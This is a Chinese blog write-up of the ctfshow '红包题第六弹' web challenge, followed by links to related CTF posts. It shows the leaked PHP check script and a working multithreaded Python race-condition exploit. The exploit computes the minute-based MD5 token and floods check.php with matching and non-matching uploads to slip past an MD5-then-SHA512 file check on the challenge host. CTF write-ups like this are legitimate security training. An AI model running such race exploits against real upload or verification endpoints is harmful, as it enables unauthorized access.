ctfshow红包题第六弹 wp

于 2024-07-11 16:57:09 发布
阅读量125 收藏 3
点赞数 3
分类专栏: web 文章标签: web安全 php python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jwkaaaaaa/article/details/140356698
版权

首先查看网页源代码

提交表单后会根据ctfshow函数进入check.php并传入参数token以及一个POST值,这里的token其实就是网页源代码中的:

扫目录发现了这些

解压web.zip可以获取check.php.bak文件

function receiveStreamFile($receiveFile){
 
    $streamData = isset($GLOBALS['HTTP_RAW_POST_DATA'])? $GLOBALS['HTTP_RAW_POST_DATA'] : '';
 
    if(empty($streamData)){
        $streamData = file_get_contents('php://input');
    }
 
    if($streamData!=''){
        $ret = file_put_contents($receiveFile, $streamData, true);
    }else{
        $ret = false;
    }
 
    return $ret;
 
}
if(md5(date("i")) === $token){
	
	$receiveFile = 'flag.dat';
	receiveStreamFile($receiveFile);
	if(md5_file($receiveFile)===md5_file("key.dat")){
		if(hash_file("sha512",$receiveFile)!=hash_file("sha512","key.dat")){
			$ret['success']="1";
			$ret['msg']="人脸识别成功!$flag";
			$ret['error']="0";
			echo json_encode($ret);
			return;
		}

			$ret['errormsg']="same file";
			echo json_encode($ret);
			return;
	}
			$ret['errormsg']="md5 error";
			echo json_encode($ret);
			return;
} 

$ret['errormsg']="token error";
echo json_encode($ret);
return;

此处定义的receiveStreamFile函数其实就是获取原始的 POST 数据流。而下面if(md5_file($receiveFile)===md5_file("key.dat")){

if(hash_file("sha512",$receiveFile)!=hash_file("sha512","key.dat")){

则是将获取的原始POST数据流的md5值与sha512值分别进行比较,md5值要相同,sha512值要不同。因此我们可以利用并发编程也就是多线程的方式来进行绕过。

Key.dat可以直接在url中输入来获得

Payload:

from datetime import datetime
import hashlib
import requests
import threading

current_time = datetime.now()
current_minute = current_time.minute
current_minute=str(current_minute)
token=hashlib.md5(current_minute.encode()).hexdigest()
key_url='https://afea67e8-5b97-45fe-8b16-bb5436c09f66.challenge.ctf.show/key.dat'
key=requests.get(key_url)
with open('key.dat','wb') as f:
    f.write(key.content)
with open('key.dat','rb') as f:
    data1=f.read()

data2='not me'
url='https://afea67e8-5b97-45fe-8b16-bb5436c09f66.challenge.ctf.show/check.php?token={}&php://input'.format(token)

def upload_data(data):
    try:
        response = requests.post(url, data=data)
        if 'ctfshow' in response.text:
            print(response.text)
        print(response.text)
    except Exception as e:
        print("somthing went wrong!")

for i in range(50):
    threading.Thread(target=upload_data, args=(data1,)).start()

for i in range(50):
    threading.Thread(target=upload_data, args=(data2,)).start()

多线程指的是在同一个进程内,同时执行多个线程的能力。因此在多线程中我们先上传一个一模一样的key.dat,然后在极短的时间内利用多线程改变$receiveFile的值来实现绕过。

流星划过小凯
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow-红包第五
m0_67507776的博客
04-19 787
1.下载压缩包,正常解压得到“《画》.mp3”,各种针对音频没有作用,上当,结束...... 2.本zip里面隐藏了一个图片,需要用foremost分离出来 3.使用steghide得到隐写flag.txt文本文件,密码是猜的123456 steghide info .\xx.jpg #检测文件 steghide extract -sf .\xx.jpg #分离文件 4.得到flag.txt aHR0cHM6Ly93d3cubGFuem91cy...
ctfshow-红包第六
XYH_233的博客
03-13 816
CTFshow红包第六,正解
ctfshow-web红包第六
最新发布
2202_75812594的博客
04-22 215
3、由于先对文件进行操作,在进行之后的判断,我们可以利用md5中间判断的极小间隙替换原来flag.dat的数据,让sha512成立,造成条件竞争。通过dirmap或者dirsearch进行目录扫描,发现了一个web.zip的文件,下载即能获取check.php的源代码。通过php://input。由于条件竞争的是利用时间间隙来进行绕过,运气不好可能需要运行多次才能看到flag。1、date获取当前时间的分钟数,然后和我们传入的Token进行一个对比。函数里有一条向服务器发送请求的代码。
CTFshow--web--红包第六
weixin_45908624的博客
01-29 884
ctfshow--web--红包第六
红包六(CTFshow)
m0_72827793的博客
01-25 954
我对应着看,结果发现都是0000,奇怪了,这怎么找?可以直接丢进去看,也可以用jd反汇编工具看。这里提示flag不在这里分析一下这段代码。3248怎么来的没搞懂,做个记录吧。就这样用jd反汇编打开这个java。但确实学习了一波压缩包的文件结构。压缩文件有5k解压却变成了1k。为什么是从第659个字节开始?jd逆向工具反编译jar文件。这得对压缩包的文件结构熟悉。jar的逆向,第一次接触。看了别人写的脚本文件。
[ctf.show.reverse] 红包
weixin_52640415的博客
04-15 1007
下来是个压缩包,解开后一个原码,解码后是notflag,发现压缩包有5k大而解出的java文件只有1k,显然包里还有内容未解出 用010打开包发现有两个EzJar.class文件,手工切出解压 import zlib inflator = zlib.decompressobj(-zlib.MAX_WBITS) f=open('EzJar.jar','rb') f.seek(659) a=f.read(3248) f.close() x = inflator.decompress(a) f=open('
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
WP2-ctfshow
02-24
2
WP1-ctfshow
02-24
1
隐藏的信息-目、WP以及知识点详解.zip
03-10
该压缩包文件包含目原、解思路(WP,Write-up)以及相关知识点的详解,对于提升网络安全技能具有很高的学习价值。 首先,让我们来看看"音频隐写"这个标签。音频隐写术是利用音频文件的特性,将秘密信息嵌入...
第二放映室用WP做的电影模板
06-04
【标】"第二放映室用WP做的电影模板"揭示了一个基于WordPress(WP)构建的电影主网站设计。WordPress是一个开源的内容管理系统(CMS),被广泛用于创建各种类型的网站,包括电影和娱乐类。这个模板可能是专门为...
ctf.show_红包第六
m0_74445847的博客
04-20 231
3.在极短的时间内,传上不同的key2.dat,通过SHA-512哈希值的比较。2.先上传一模一样的key.dat,通过md5值的比较。这里放了竞争的两种格式。
CTFshow-web-红包第六
qq_68581192的博客
11-03 154
首先获得key.dat,首先访问一下这个文件,emmm,果然直接下载了,那么第一层的绕过我们直接就使用了key.dat文件,第二层的sha1值我们随便上传一个字符串即可,所以我们需要并发编程,将$receiveFile中的内容在极短时间内进行替换,这里我们可以编写一个python脚本来进行解。发现web.zip目录是直接下载的,另外两个会跳转页面,但是内容是显示什么什么然后error。发现是跟key.dat比较,我们尝试在url中添加/key.dat,发现可以下载,我们利用下列代码。
ctfshow-web-红包第六
HAI_WD的博客
08-26 1165
原理就是将上传的文件保存为flag.dat,然后进行对比,那么这种情况肯定会出现条件竞争,也就是说flag.dat在比较完第一次之后被覆盖了的话,就可以满足第二个条件。进行md5,然后就是文件md5对比,要求md5一致,但是sha512不一样,这里比较的文件是key.dat。首先跑一下字典,这里用的dirmap,可以看到有一个web.zip。下载下来之后发现是一个网站备份,备份的是check.php.bak。然后接着看,可以看到这里不太可能是sql注入,有一个请求。直接访问进行下载即可。
ctfshow红包第六
weixin_43873408的博客
08-02 1670
在开始界面点击hint得到提示信息: 打开连接得到的是一个登录界面,前面提示了不是sql注入,直接放弃尝试,查看网页源码得到信息: <script> function login(s){ var u=document.getElementById("username").value; var p=document.getElementById("password").value; var xhr = new XMLHttpRequest();
之旅第39站,CTFshow 红包目8
cc菜的一批
02-19 898
感谢ctf show平台提供目 下载压缩包,看到了两个文件。 使用010editor 打开mima.png ,在末尾处发现 kobe code。 这里附上@Admin师傅提供的kobe code对照图。 对应着解出来了压缩包密码。 OAEBEYTKNRBANB 解压出NBA.mp4之后,我们发现视频并不能播放,使用010查看前几个十六进制为: 再百度一下mp4的文件结构。 通过规律,...
CTFSHOW WEB
qq_45655564的博客
08-09 2821
web签到 网页原代码中发现这个,base64解码就是flag web2 这道目就是最简单的SQL注入了 发现万能密码可以成功。 于是后台查询语句猜测是select ‘column’ from ‘table’ where username=’$_POST[]’&password=’$_POST[]’ limit 1,1 自己猜的熬,不一定是完全正确的。 这样的话直接闭合前面的单引号就行了。 之后就是 123’ or 1=1 union select 1,2,3# 123’ or 1=1 un
CTF.show:新春红包wp
qq_46230755的博客
02-18 2734
这次ctfshow的新春赛,一共八,领到了六红包,第八是我出的,然后除了狸最后都有做出来。菜鸡一个罢了,简单写的wp师傅们蛮看看点点关注。然后感谢做过程中大师傅们的帮助,就不一一点名了,都是大师傅带的好我才做的出来的。 文章目录除夕:属于大牛的压缩包初一:爆竹声声初二:先天八卦操初三(情人节):阴阳人初四:长虫初五:新年好?初六:牛年大吉2.0初七:古代非对称密码 除夕:属于大牛的压缩包 目打开,修改文件名后缀为zip,打开后发现存在25个图片,复制25份,每份留下一份图片,对压缩包密码.
ctfshow元旦水友赛wp
04-13
很抱歉,我无法提供关于ctfshow元旦水友赛wp的具体介绍,因为我无法获取实时的比赛信息。但是,我可以告诉你一些关于CTF比赛的基本知识和常见的解思路。 CTF(Capture The Flag)比赛是一种网络安全竞赛,旨在考察参赛者在网络安全领域的技能和知识。比赛通常包括密码学、逆向工程、Web安全、二进制漏洞利用等多个领域的目。 在CTF比赛中,参赛者需要通过解决一系列的目来获取旗帜(Flag),并提交给比赛平台进行得分。每个目都有不同的解思路和技巧,有些可能需要进行逆向分析、漏洞利用,有些可能需要进行密码学算法破解或者Web应用漏洞挖掘。 解过程中,参赛者通常需要具备良好的编程和网络安全知识,能够熟练运用各种工具和技术进行分析和攻击。此外,团队合作和快速学习能力也是取得好成绩的重要因素。 如果你对CTF比赛感兴趣,可以参加一些线上或线下的CTF比赛,通过实践来提升自己的技能。同时,也可以学习相关的网络安全知识和技术,例如密码学、漏洞利用、网络协议等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值